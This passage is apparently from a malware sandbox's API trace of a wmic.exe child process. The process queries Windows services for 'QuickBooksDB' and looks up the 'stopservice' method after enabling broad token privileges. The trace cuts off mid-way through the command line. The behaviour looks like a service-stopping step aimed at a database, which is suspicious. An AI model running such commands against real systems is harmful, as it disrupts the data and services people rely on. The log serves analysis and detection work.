[0303.263] free (_Block=0x2f2ba08) [0303.263] IWbemClassObject:NextMethod (in: This=0x2fc0a90, lFlags=0, pstrName=0x97d768*=0x0, ppInSignature=0x97d764*=0x0, ppOutSignature=0x97d760*=0x0 | out: pstrName=0x97d768*="PauseService", ppInSignature=0x97d764*=0x0, ppOutSignature=0x97d760*=0x2f97390) returned 0x0 [0303.263] lstrlenW (lpString="PauseService") returned 12 [0303.263] lstrlenW (lpString="stopservice") returned 11 [0303.263] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0303.263] IUnknown:Release (This=0x2f97390) returned 0x0 [0303.263] IWbemClassObject:NextMethod (in: This=0x2fc0a90, lFlags=0, pstrName=0x97d768*=0x0, ppInSignature=0x97d764*=0x0, ppOutSignature=0x97d760*=0x0 | out: pstrName=0x97d768*="ResumeService", ppInSignature=0x97d764*=0x0, ppOutSignature=0x97d760*=0x2f97390) returned 0x0 [0303.263] lstrlenW (lpString="ResumeService") returned 13 [0303.263] lstrlenW (lpString="stopservice") returned 11 [0303.263] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0303.264] IUnknown:Release (This=0x2f97390) returned 0x0 [0303.264] IWbemClassObject:NextMethod (in: This=0x2fc0a90, lFlags=0, pstrName=0x97d768*=0x0, ppInSignature=0x97d764*=0x0, ppOutSignature=0x97d760*=0x0 | out: pstrName=0x97d768*="InterrogateService", ppInSignature=0x97d764*=0x0, ppOutSignature=0x97d760*=0x2f97390) returned 0x0 [0303.264] lstrlenW (lpString="InterrogateService") returned 18 [0303.264] lstrlenW (lpString="stopservice") returned 11 [0303.264] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0303.264] IUnknown:Release (This=0x2f97390) returned 0x0 [0303.264] IWbemClassObject:NextMethod (in: This=0x2fc0a90, lFlags=0, pstrName=0x97d768*=0x0, ppInSignature=0x97d764*=0x0, ppOutSignature=0x97d760*=0x0 | out: pstrName=0x97d768*="UserControlService", ppInSignature=0x97d764*=0x2fc0c88, ppOutSignature=0x97d760*=0x2fc35b8) returned 0x0 [0303.264] lstrlenW (lpString="UserControlService") returned 18 [0303.264] lstrlenW (lpString="stopservice") returned 11 [0303.264] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0303.264] IUnknown:Release (This=0x2fc0c88) returned 0x0 [0303.264] IUnknown:Release (This=0x2fc35b8) returned 0x0 [0303.264] IWbemClassObject:NextMethod (in: This=0x2fc0a90, lFlags=0, pstrName=0x97d768*=0x0, ppInSignature=0x97d764*=0x0, ppOutSignature=0x97d760*=0x0 | out: pstrName=0x97d768*="Create", ppInSignature=0x97d764*=0x2fc0c88, ppOutSignature=0x97d760*=0x2fc5710) returned 0x0 [0303.265] lstrlenW (lpString="Create") returned 6 [0303.265] lstrlenW (lpString="stopservice") returned 11 [0303.265] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0303.265] IUnknown:Release (This=0x2fc0c88) returned 0x0 [0303.265] IUnknown:Release (This=0x2fc5710) returned 0x0 [0303.265] IWbemClassObject:NextMethod (in: This=0x2fc0a90, lFlags=0, pstrName=0x97d768*=0x0, ppInSignature=0x97d764*=0x0, ppOutSignature=0x97d760*=0x0 | out: pstrName=0x97d768*="Change", ppInSignature=0x97d764*=0x2fc0c88, ppOutSignature=0x97d760*=0x2fc5490) returned 0x0 [0303.265] lstrlenW (lpString="Change") returned 6 [0303.265] lstrlenW (lpString="stopservice") returned 11 [0303.265] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0303.265] IUnknown:Release (This=0x2fc0c88) returned 0x0 [0303.266] IUnknown:Release (This=0x2fc5490) returned 0x0 [0303.266] IWbemClassObject:NextMethod (in: This=0x2fc0a90, lFlags=0, pstrName=0x97d768*=0x0, ppInSignature=0x97d764*=0x0, ppOutSignature=0x97d760*=0x0 | out: pstrName=0x97d768*="ChangeStartMode", ppInSignature=0x97d764*=0x2fc0c88, ppOutSignature=0x97d760*=0x2fc3740) returned 0x0 [0303.266] lstrlenW (lpString="ChangeStartMode") returned 15 [0303.266] lstrlenW (lpString="stopservice") returned 11 [0303.266] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0303.266] IUnknown:Release (This=0x2fc0c88) returned 0x0 [0303.266] IUnknown:Release (This=0x2fc3740) returned 0x0 [0303.266] IWbemClassObject:NextMethod (in: This=0x2fc0a90, lFlags=0, pstrName=0x97d768*=0x0, ppInSignature=0x97d764*=0x0, ppOutSignature=0x97d760*=0x0 | out: pstrName=0x97d768*="Delete", ppInSignature=0x97d764*=0x0, ppOutSignature=0x97d760*=0x2f97390) returned 0x0 [0303.266] lstrlenW (lpString="Delete") returned 6 [0303.266] lstrlenW (lpString="stopservice") returned 11 [0303.266] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0303.266] IUnknown:Release (This=0x2f97390) returned 0x0 [0303.266] IWbemClassObject:NextMethod (in: This=0x2fc0a90, lFlags=0, pstrName=0x97d768*=0x0, ppInSignature=0x97d764*=0x0, ppOutSignature=0x97d760*=0x0 | out: pstrName=0x97d768*="GetSecurityDescriptor", ppInSignature=0x97d764*=0x0, ppOutSignature=0x97d760*=0x2fc0c88) returned 0x0 [0303.266] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0303.266] lstrlenW (lpString="stopservice") returned 11 [0303.266] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0303.267] IUnknown:Release (This=0x2fc0c88) returned 0x0 [0303.267] IWbemClassObject:NextMethod (in: This=0x2fc0a90, lFlags=0, pstrName=0x97d768*=0x0, ppInSignature=0x97d764*=0x0, ppOutSignature=0x97d760*=0x0 | out: pstrName=0x97d768*="SetSecurityDescriptor", ppInSignature=0x97d764*=0x2fc0c88, ppOutSignature=0x97d760*=0x2fc35b8) returned 0x0 [0303.267] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0303.267] lstrlenW (lpString="stopservice") returned 11 [0303.267] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0303.267] IUnknown:Release (This=0x2fc0c88) returned 0x0 [0303.267] IUnknown:Release (This=0x2fc35b8) returned 0x0 [0303.267] IWbemClassObject:NextMethod (in: This=0x2fc0a90, lFlags=0, pstrName=0x97d768*=0x0, ppInSignature=0x97d764*=0x0, ppOutSignature=0x97d760*=0x0 | out: pstrName=0x97d768*=0x0, ppInSignature=0x97d764*=0x0, ppOutSignature=0x97d760*=0x0) returned 0x40005 [0303.267] IUnknown:Release (This=0x2fc0a90) returned 0x0 [0303.267] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0303.267] lstrlenW (lpString="SET") returned 3 [0303.267] lstrlenW (lpString="call") returned 4 [0303.267] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0303.267] lstrlenW (lpString="CREATE") returned 6 [0303.267] lstrlenW (lpString="call") returned 4 [0303.267] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0303.267] free (_Block=0x2f22da8) [0303.267] malloc (_Size=0x4) returned 0x2f2b1e8 [0303.267] lstrlenW (lpString="GET") returned 3 [0303.267] lstrlenW (lpString="call") returned 4 [0303.268] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0303.268] lstrlenW (lpString="LIST") returned 4 [0303.268] lstrlenW (lpString="call") returned 4 [0303.268] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0303.268] lstrlenW (lpString="ASSOC") returned 5 [0303.268] lstrlenW (lpString="call") returned 4 [0303.268] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0303.268] WbemLocator:IUnknown:AddRef (This=0x2f648a0) returned 0x3 [0303.268] free (_Block=0x2f21208) [0303.268] lstrlenW (lpString="") returned 0 [0303.268] lstrlenW (lpString="NQDPDE") returned 6 [0303.268] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0303.268] lstrlenW (lpString="NQDPDE") returned 6 [0303.268] malloc (_Size=0xe) returned 0x2f2ad38 [0303.268] lstrlenW (lpString="NQDPDE") returned 6 [0303.268] GetCurrentThreadId () returned 0xfac [0303.268] GetCurrentProcess () returned 0xffffffff [0303.268] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x97f844 | out: TokenHandle=0x97f844*=0x2f8) returned 1 [0303.268] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x97f840 | out: TokenInformation=0x0, ReturnLength=0x97f840) returned 0 [0303.268] malloc (_Size=0x118) returned 0x2f2ba08 [0303.268] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x2f2ba08, TokenInformationLength=0x118, ReturnLength=0x97f840 | out: TokenInformation=0x2f2ba08, ReturnLength=0x97f840) returned 1 [0303.268] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x2f2ba08*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0303.268] free (_Block=0x2f2ba08) [0303.268] CloseHandle (hObject=0x2f8) returned 1 [0303.269] lstrlenW (lpString="GET") returned 3 [0303.269] lstrlenW (lpString="call") returned 4 [0303.269] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0303.269] lstrlenW (lpString="LIST") returned 4 [0303.269] lstrlenW (lpString="call") returned 4 [0303.269] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0303.269] lstrlenW (lpString="SET") returned 3 [0303.269] lstrlenW (lpString="call") returned 4 [0303.269] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0303.269] lstrlenW (lpString="CALL") returned 4 [0303.269] lstrlenW (lpString="call") returned 4 [0303.269] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0303.269] ??0CHString@@QAE@XZ () returned 0x97f804 [0303.269] GetCurrentThreadId () returned 0xfac [0303.269] malloc (_Size=0xc) returned 0x2f2acf0 [0303.269] malloc (_Size=0xc) returned 0x2f2ad08 [0303.269] malloc (_Size=0xc) returned 0x2f2ad20 [0303.269] malloc (_Size=0xc) returned 0x2f2ad80 [0303.270] malloc (_Size=0xc) returned 0x2f297f0 [0303.270] SysStringLen (param_1="\\\\") returned 0x2 [0303.270] SysStringLen (param_1="NQDPDE") returned 0x6 [0303.270] malloc (_Size=0xc) returned 0x2f2c080 [0303.270] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0303.270] SysStringLen (param_1="\\") returned 0x1 [0303.270] malloc (_Size=0xc) returned 0x2f2c0c8 [0303.270] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0303.270] SysStringLen (param_1="root\\cimv2") returned 0xa [0303.270] free (_Block=0x2f2c080) [0303.270] free (_Block=0x2f297f0) [0303.270] free (_Block=0x2f2ad80) [0303.270] free (_Block=0x2f2ad20) [0303.271] free (_Block=0x2f2ad08) [0303.271] free (_Block=0x2f2acf0) [0303.271] malloc (_Size=0xc) returned 0x2f2c0e0 [0303.271] malloc (_Size=0xc) returned 0x2f2c0b0 [0303.271] malloc (_Size=0xc) returned 0x2f2c050 [0303.271] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2f648a0, strNetworkResource="\\\\NQDPDE\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68564 | out: ppNamespace=0xa68564*=0x2fc1398) returned 0x0 [0303.294] free (_Block=0x2f2c050) [0303.294] free (_Block=0x2f2c0b0) [0303.294] free (_Block=0x2f2c0e0) [0303.294] CoSetProxyBlanket (pProxy=0x2fc1398, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0303.294] free (_Block=0x2f2c0c8) [0303.294] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0303.294] ??0CHString@@QAE@XZ () returned 0x97f7fc [0303.294] GetCurrentThreadId () returned 0xfac [0303.294] malloc (_Size=0x38) returned 0x2f2ba08 [0303.295] malloc (_Size=0x28) returned 0x2f2ba48 [0303.295] malloc (_Size=0x28) returned 0x2f2ba78 [0303.295] malloc (_Size=0x38) returned 0x2f2baa8 [0303.295] malloc (_Size=0x38) returned 0x2f2bae8 [0303.295] malloc (_Size=0x24) returned 0x2f2bb28 [0303.295] malloc (_Size=0xc) returned 0x2f2acf0 [0303.295] lstrlenA (lpString="") returned 0 [0303.295] malloc (_Size=0x2) returned 0x2f2b1f8 [0303.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x2f2b1f8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0303.295] free (_Block=0x2f2b1f8) [0303.295] malloc (_Size=0x38) returned 0x2f2bb58 [0303.295] malloc (_Size=0x24) returned 0x2f2bb98 [0303.295] malloc (_Size=0xc) returned 0x2f2ad08 [0303.295] free (_Block=0x2f2acf0) [0303.295] IWbemServices:GetObject (in: This=0x2fc1398, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x97f7d4*=0x0, ppCallResult=0x0 | out: ppObject=0x97f7d4*=0x2fc0a90, ppCallResult=0x0) returned 0x0 [0303.348] malloc (_Size=0xc) returned 0x2f2acf0 [0303.348] IWbemClassObject:GetMethod (in: This=0x2fc0a90, wszName="stopservice", lFlags=0, ppInSignature=0x97f7f0, ppOutSignature=0x97f7d0 | out: ppInSignature=0x97f7f0*=0x0, ppOutSignature=0x97f7d0*=0x2fc0c88) returned 0x0 [0303.348] free (_Block=0x2f2acf0) [0303.348] IUnknown:Release (This=0x2fc0c88) returned 0x0 [0303.348] IUnknown:Release (This=0x2fc0a90) returned 0x0 [0303.348] ??0CHString@@QAE@XZ () returned 0x97f6b4 [0303.348] GetCurrentThreadId () returned 0xfac [0303.348] malloc (_Size=0xc) returned 0x2f2acf0 [0303.348] lstrlenA (lpString="") returned 0 [0303.349] malloc (_Size=0x2) returned 0x2f2b1f8 [0303.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x2f2b1f8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0303.349] free (_Block=0x2f2b1f8) [0303.349] malloc (_Size=0xc) returned 0x2f2ad20 [0303.349] lstrlenA (lpString="") returned 0 [0303.349] malloc (_Size=0x2) returned 0x2f2b1f8 [0303.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x2f2b1f8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0303.349] free (_Block=0x2f2b1f8) [0303.349] malloc (_Size=0xc) returned 0x2f2ad80 [0303.349] free (_Block=0x2f2ad20) [0303.349] malloc (_Size=0xc) returned 0x2f2ad20 [0303.349] lstrlenA (lpString="SELECT * FROM ") returned 14 [0303.349] malloc (_Size=0x1e) returned 0x2f2bbc8 [0303.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa24354, cbMultiByte=-1, lpWideCharStr=0x2f2bbc8, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0303.349] free (_Block=0x2f2bbc8) [0303.349] malloc (_Size=0xc) returned 0x2f297f0 [0303.349] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0303.349] SysStringLen (param_1="Win32_Service") returned 0xd [0303.349] free (_Block=0x2f2ad20) [0303.349] malloc (_Size=0xc) returned 0x2f2ad20 [0303.349] malloc (_Size=0xc) returned 0x2f2c0e0 [0303.349] lstrlenA (lpString=" WHERE ") returned 7 [0303.349] malloc (_Size=0x10) returned 0x2f2c068 [0303.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa237a8, cbMultiByte=-1, lpWideCharStr=0x2f2c068, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0303.349] free (_Block=0x2f2c068) [0303.349] malloc (_Size=0xc) returned 0x2f2c080 [0303.349] SysStringLen (param_1=" WHERE ") returned 0x7 [0303.350] SysStringLen (param_1="name like '%%QuickBooksDB%%'") returned 0x1c [0303.350] malloc (_Size=0xc) returned 0x2f2c068 [0303.350] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0303.350] SysStringLen (param_1=" WHERE name like '%%QuickBooksDB%%'") returned 0x23 [0303.350] free (_Block=0x2f297f0) [0303.350] free (_Block=0x2f2c080) [0303.350] free (_Block=0x2f2c0e0) [0303.350] free (_Block=0x2f2ad20) [0303.350] malloc (_Size=0xc) returned 0x2f2c0c8 [0303.350] IWbemServices:ExecQuery (in: This=0x2fc1398, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%QuickBooksDB%%'", lFlags=48, pCtx=0x0, ppEnum=0x97f6c0 | out: ppEnum=0x97f6c0*=0x2fc48d0) returned 0x0 [0303.413] free (_Block=0x2f2c0c8) [0303.413] CoSetProxyBlanket (pProxy=0x2fc48d0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0303.444] IEnumWbemClassObject:Next (in: This=0x2fc48d0, lTimeout=-1, uCount=0x1, apObjects=0x97f6bc, puReturned=0x97f6ac | out: apObjects=0x97f6bc*=0x0, puReturned=0x97f6ac*=0x0) returned 0x1 [0304.361] IUnknown:Release (This=0x2fc48d0) returned 0x0 [0304.365] free (_Block=0x2f2c068) [0304.365] free (_Block=0x2f2ad80) [0304.365] free (_Block=0x2f2acf0) [0304.365] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0304.365] free (_Block=0x2f2ad08) [0304.365] free (_Block=0x2f2bb28) [0304.365] free (_Block=0x2f2bae8) [0304.365] free (_Block=0x2f2baa8) [0304.365] free (_Block=0x2f2ba78) [0304.365] free (_Block=0x2f2ba48) [0304.365] free (_Block=0x2f2bb98) [0304.365] free (_Block=0x2f2bb58) [0304.365] free (_Block=0x2f2ba08) [0304.365] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0304.365] GetCurrentThreadId () returned 0xfac [0304.365] ??0CHString@@QAE@PBG@Z () returned 0x97f874 [0304.366] ??YCHString@@QAEABV0@PBG@Z () returned 0x97f874 [0304.366] malloc (_Size=0x800) returned 0x2f2c110 [0304.366] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x2f2c110, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0304.366] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0304.366] malloc (_Size=0x1c) returned 0x2f2ba08 [0304.366] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x2f2ba08, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0304.366] __iob_func () returned 0x776f2608 [0304.366] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 27 [0304.366] __iob_func () returned 0x776f2608 [0304.366] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0304.367] free (_Block=0x2f2ba08) [0304.367] free (_Block=0x2f2c110) [0304.367] ??1CHString@@QAE@XZ () returned 0x1 [0304.367] WbemLocator:IUnknown:Release (This=0x2fc1398) returned 0x0 [0304.368] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0304.368] _kbhit () returned 0x0 [0304.372] free (_Block=0x2f2b1e8) [0304.372] free (_Block=0x2f2abe8) [0304.372] free (_Block=0x2f2ad98) [0304.372] free (_Block=0x2f2ac18) [0304.372] free (_Block=0x2f2abb8) [0304.372] free (_Block=0x2f2b058) [0304.372] free (_Block=0x2f2b1c0) [0304.372] free (_Block=0x2f29da8) [0304.372] free (_Block=0x2f2b250) [0304.372] free (_Block=0x2f2ac00) [0304.372] free (_Block=0x2f229e8) [0304.372] free (_Block=0x2f20508) [0304.372] free (_Block=0x2f2bcd8) [0304.372] free (_Block=0x2f2ac30) [0304.372] free (_Block=0x2f2ac78) [0304.372] free (_Block=0x2f2bc98) [0304.373] free (_Block=0x2f2bc58) [0304.373] free (_Block=0x2f2aca8) [0304.373] free (_Block=0x2f2acd8) [0304.373] free (_Block=0x2f2acc0) [0304.373] free (_Block=0x2f2bc28) [0304.373] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0304.373] free (_Block=0x2f2b0f8) [0304.373] free (_Block=0x2f2ad68) [0304.373] free (_Block=0x2f2b198) [0304.373] free (_Block=0x2f2adb0) [0304.373] free (_Block=0x2f2b208) [0304.373] free (_Block=0x2f2ac48) [0304.373] free (_Block=0x2f22cc8) [0304.373] free (_Block=0x2f226b0) [0304.373] free (_Block=0x2f226f8) [0304.373] free (_Block=0x2f22740) [0304.373] free (_Block=0x2f2ad38) [0304.373] free (_Block=0x2f227d8) [0304.373] free (_Block=0x2f204f0) [0304.373] free (_Block=0x2f22d28) [0304.373] free (_Block=0x2f204d8) [0304.373] free (_Block=0x2f22b68) [0304.374] free (_Block=0x2f204a0) [0304.374] free (_Block=0x2f204b8) [0304.374] free (_Block=0x2f22918) [0304.374] free (_Block=0x2f22930) [0304.374] free (_Block=0x2f228e0) [0304.374] free (_Block=0x2f228f8) [0304.374] free (_Block=0x2f22950) [0304.374] free (_Block=0x2f22968) [0304.374] free (_Block=0x2f22988) [0304.374] free (_Block=0x2f229a0) [0304.374] free (_Block=0x2f22870) [0304.374] free (_Block=0x2f22888) [0304.374] free (_Block=0x2f22838) [0304.374] free (_Block=0x2f22850) [0304.374] free (_Block=0x2f228a8) [0304.374] free (_Block=0x2f228c0) [0304.374] free (_Block=0x2f22800) [0304.374] free (_Block=0x2f22818) [0304.374] free (_Block=0x2f227b0) [0304.374] free (_Block=0x2f22788) [0304.374] free (_Block=0x2f2afd0) [0304.375] WbemLocator:IUnknown:Release (This=0x2f648a0) returned 0x2 [0304.375] WbemLocator:IUnknown:Release (This=0x2f6b1d0) returned 0x0 [0304.376] WbemLocator:IUnknown:Release (This=0x2f648a0) returned 0x1 [0304.376] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0304.376] WbemLocator:IUnknown:Release (This=0x2f648a0) returned 0x0 [0304.376] free (_Block=0x2f2ad50) [0304.376] free (_Block=0x2f2ab40) [0304.376] free (_Block=0x2f22c68) [0304.376] free (_Block=0x2f2ade0) [0304.376] free (_Block=0x2f2ab58) [0304.376] free (_Block=0x2f22ae8) [0304.376] free (_Block=0x2f2ae28) [0304.376] free (_Block=0x2f2ae70) [0304.376] free (_Block=0x2f22aa8) [0304.376] free (_Block=0x2f2abd0) [0304.376] free (_Block=0x2f2ab88) [0304.376] free (_Block=0x2f22ac8) [0304.376] free (_Block=0x2f2ae88) [0304.376] free (_Block=0x2f2ae58) [0304.376] free (_Block=0x2f22c08) [0304.377] free (_Block=0x2f2aeb8) [0304.377] free (_Block=0x2f2aed0) [0304.377] free (_Block=0x2f22ce8) [0304.377] free (_Block=0x2f2adc8) [0304.377] free (_Block=0x2f2ab10) [0304.377] free (_Block=0x2f22d68) [0304.377] free (_Block=0x2f2aba0) [0304.377] free (_Block=0x2f2ac90) [0304.377] free (_Block=0x2f22c48) [0304.377] free (_Block=0x2f29820) [0304.377] free (_Block=0x2f2ae40) [0304.377] free (_Block=0x2f22d88) [0304.377] free (_Block=0x2f2aea0) [0304.377] free (_Block=0x2f2ae10) [0304.377] free (_Block=0x2f22be8) [0304.377] free (_Block=0x2f2adf8) [0304.377] free (_Block=0x2f2ab28) [0304.377] free (_Block=0x2f22b28) [0304.377] free (_Block=0x2f2ac60) [0304.378] free (_Block=0x2f2ab70) [0304.378] free (_Block=0x2f22c28) [0304.378] free (_Block=0x2f298e0) [0304.378] free (_Block=0x2f29940) [0304.378] free (_Block=0x2f22d48) [0304.378] free (_Block=0x2f29898) [0304.378] free (_Block=0x2f299b8) [0304.378] free (_Block=0x2f22b48) [0304.378] free (_Block=0x2f29910) [0304.378] free (_Block=0x2f29868) [0304.378] free (_Block=0x2f22d08) [0304.378] free (_Block=0x2f298c8) [0304.378] free (_Block=0x2f29928) [0304.378] free (_Block=0x2f22a08) [0304.378] free (_Block=0x2f298f8) [0304.378] free (_Block=0x2f29958) [0304.378] free (_Block=0x2f22a88) [0304.378] free (_Block=0x2f29808) [0304.378] free (_Block=0x2f29838) [0304.378] free (_Block=0x2f22b88) [0304.379] free (_Block=0x2f298b0) [0304.379] free (_Block=0x2f29850) [0304.379] free (_Block=0x2f22a48) [0304.379] free (_Block=0x2f29970) [0304.379] free (_Block=0x2f29880) [0304.379] free (_Block=0x2f22ba8) [0304.379] free (_Block=0x2f29988) [0304.379] free (_Block=0x2f299a0) [0304.379] free (_Block=0x2f22bc8) [0304.379] CoUninitialize () [0304.418] exit (_Code=0) [0304.418] free (_Block=0x2f2aee8) [0304.418] free (_Block=0x2f21010) [0304.418] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0304.418] free (_Block=0x2f20550) [0304.419] free (_Block=0x2f227f0) [0304.419] free (_Block=0x2f20ff0) [0304.419] free (_Block=0x2f20fd0) [0304.419] free (_Block=0x2f20fa0) [0304.419] free (_Block=0x2f20f80) [0304.419] free (_Block=0x2f20f50) [0304.419] free (_Block=0x2f20f10) [0304.419] free (_Block=0x2f20ef0) [0304.419] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0304.419] free (_Block=0x2f22ca8) Thread: id = 297 os_tid = 0xe4c Thread: id = 298 os_tid = 0xebc Thread: id = 299 os_tid = 0x1248 Thread: id = 300 os_tid = 0x11e8 Process: id = "28" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x1683d000" os_pid = "0x428" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x13b8" cmd_line = "\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like 